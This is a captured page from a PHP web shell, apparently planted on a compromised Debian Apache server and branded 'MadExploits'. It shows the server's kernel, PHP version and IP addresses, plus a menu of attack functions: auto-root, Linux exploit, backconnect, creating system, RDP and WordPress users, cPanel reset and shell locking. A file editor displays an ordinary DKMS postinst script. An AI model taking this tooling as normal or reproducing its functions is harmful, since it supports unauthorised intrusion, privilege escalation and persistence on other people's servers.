Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.191.67.90
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
dkms /
template-dkms-mkdeb /
debian /
[ HOME SHELL ]
Name
Size
Permission
Action
README.Debian
150
B
-rw-r--r--
changelog
189
B
-rw-r--r--
compat
2
B
-rw-r--r--
control
367
B
-rw-r--r--
copyright
70
B
-rw-r--r--
dirs
8
B
-rw-r--r--
postinst
1.2
KB
-rwxr-xr-x
prerm
360
B
-rwxr-xr-x
rules
881
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : postinst
#!/bin/sh # Copyright (C) 2002-2005 Flavio Stanchina # Copyright (C) 2005-2006 Aric Cyr # Copyright (C) 2007 Mario Limonciello # Copyright (C) 2009 Alberto Milone set -e NAME=MODULE_NAME PACKAGE_NAME=$NAME-dkms DEB_NAME=$(echo $PACKAGE_NAME | sed 's,_,-,') CVERSION=`dpkg-query -W -f='${Version}' $DEB_NAME | awk -F "-" '{print $1}' | cut -d\: -f2` ARCH=`dpkg --print-architecture` dkms_configure () { for POSTINST in /usr/lib/dkms/common.postinst "/usr/share/$PACKAGE_NAME/postinst"; do if [ -f "$POSTINST" ]; then "$POSTINST" "$NAME" "$CVERSION" "/usr/share/$PACKAGE_NAME" "$ARCH" "$2" return $? fi echo "WARNING: $POSTINST does not exist." >&2 done echo "ERROR: DKMS version is too old and $PACKAGE_NAME was not" >&2 echo "built with legacy DKMS support." >&2 echo "You must either rebuild $PACKAGE_NAME with legacy postinst" >&2 echo "support or upgrade DKMS to a more current version." >&2 return 1 } case "$1" in configure) dkms_configure ;; abort-upgrade|abort-remove|abort-deconfigure) ;; *) echo "postinst called with unknown argument \`$1'" >&2 exit 1 ;; esac # dh_installdeb will replace this with shell code automatically # generated by other debhelper scripts. #DEBHELPER# exit 0
Close